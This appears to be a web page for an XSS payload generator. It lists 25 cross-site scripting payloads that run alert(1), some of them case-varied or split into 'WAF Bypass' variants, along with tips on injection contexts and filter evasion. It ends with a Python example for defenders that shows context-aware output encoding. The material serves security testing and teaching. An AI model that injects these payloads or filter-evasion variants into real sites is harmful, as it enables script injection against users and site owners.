Interactive Tool
XSS Payload Generator
Generate context-aware Cross-Site Scripting (XSS) payloads. Select your injection point, apply encodings to bypass filters, and get instant results.
For authorized security testing only. Unauthorized use is illegal.
Injection Context: Between tags
Encoding: none
Custom JavaScript: alert(1) (8 chars)
Generated Payloads (25 results; variants tagged "WAF Bypass" are the filter-evasion forms of the payload above them)
- <script>alert(1)</script>
- <ScRiPt>alert(1)</ScRiPt> (WAF Bypass)
- <scr ipt>alert(1)</script> (WAF Bypass)
- <img src=x onerror=alert(1)>
- <img src=x ONERROR=alert(1)> (WAF Bypass)
- <IMG src=x onerror=alert(1)> (WAF Bypass)
- <svg onload=alert(1)>
- <body onload=alert(1)>
- <iframe src="javascript:alert(1)">
- <iframe src="javascr ipt:alert(1)"> (WAF Bypass)
- <marquee onstart=alert(1)>
- <video><source onerror=alert(1)>
- <video><source ONERROR=alert(1)> (WAF Bypass)
- <details open ontoggle=alert(1)>
- <math><mtext><table><mglyph><style><img src=x onerror=alert(1)>
- <math><mtext><table><mglyph><style><img src=x ONERROR=alert(1)> (WAF Bypass)
- <math><mtext><table><mglyph><style><IMG src=x onerror=alert(1)> (WAF Bypass)
- <input onfocus=alert(1) autofocus>
- <select onfocus=alert(1) autofocus>
- <textarea onfocus=alert(1) autofocus>
- <keygen onfocus=alert(1) autofocus>
- <audio src=x onerror=alert(1)>
- <audio src=x ONERROR=alert(1)> (WAF Bypass)
- <object data="javascript:alert(1)">
- <object data="javascr ipt:alert(1)"> (WAF Bypass)
Quick Reference
Context Tips
- HTML Body: Standard injection between tags. <script> works here.
- Attribute: Inside tag attributes like value="...". You often need to break out with ">.
- JavaScript: Inside existing <script> blocks. You need to terminate the current statement.
- URL: In href or src attributes. The javascript: protocol is key here.
Bypass Techniques
- Case Variation: <ScRiPt> can bypass simple regex filters.
- HTML Entities: " becomes an entity such as &quot;. Browsers decode this in attributes.
- URL Encoding: Useful when input is reflected in a URL parameter.
- Double Encoding: Can bypass WAFs that decode only once.
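As the defender-side counterpart to the Context Tips and Bypass Techniques above, here is an added Python example (not part of this tool) that encodes a value on output for the exact context it lands in, and shows why a case-sensitive blocklist fails where encoding does not; the names safe_href, encode_for_context and blocklist_blocks are chosen here.

```python
import html
import json
import re

# Added defensive example, not code from the tool on this page: encode a
# user-supplied value on OUTPUT for the context it lands in (the four
# contexts under "Context Tips") instead of trying to spot payloads on input.

_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):", re.I)


def safe_href(url: str) -> str:
    """Value for an href/src attribute: allow only http(s) or relative URLs."""
    # Browsers drop tabs/newlines anywhere in a URL, so a scheme split by
    # whitespace is still javascript:. Conservatively strip all of it first.
    cleaned = re.sub(r"[\x00-\x20]", "", url)
    m = _SCHEME.match(cleaned)
    if m and m.group(1).lower() not in ("http", "https"):
        return "#"  # javascript:, data:, etc. become a neutral link
    return html.escape(cleaned, quote=True)


def encode_for_context(value: str, context: str) -> str:
    """Return `value` made inert for the given output context."""
    if context == "html":
        # Between tags: '<' can no longer open a tag, whatever its case.
        return html.escape(value, quote=False)
    if context == "attribute":
        # Inside value="...": the breakout '">' loses its quote. The template
        # must still quote the attribute for this to hold.
        return html.escape(value, quote=True)
    if context == "js":
        # Inside a <script> string literal: JSON escapes the quotes, and the
        # extra '<'/'>' escapes stop '</script>' from closing the block.
        return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")
    if context == "url":
        return safe_href(value)
    raise ValueError(f"unknown context: {context}")


def blocklist_blocks(value: str) -> bool:
    """The kind of filter 'Bypass Techniques' describes: a case-sensitive
    match on <script>. Case variation slips past it; encoding does not care."""
    return re.search(r"<script>", value) is not None
```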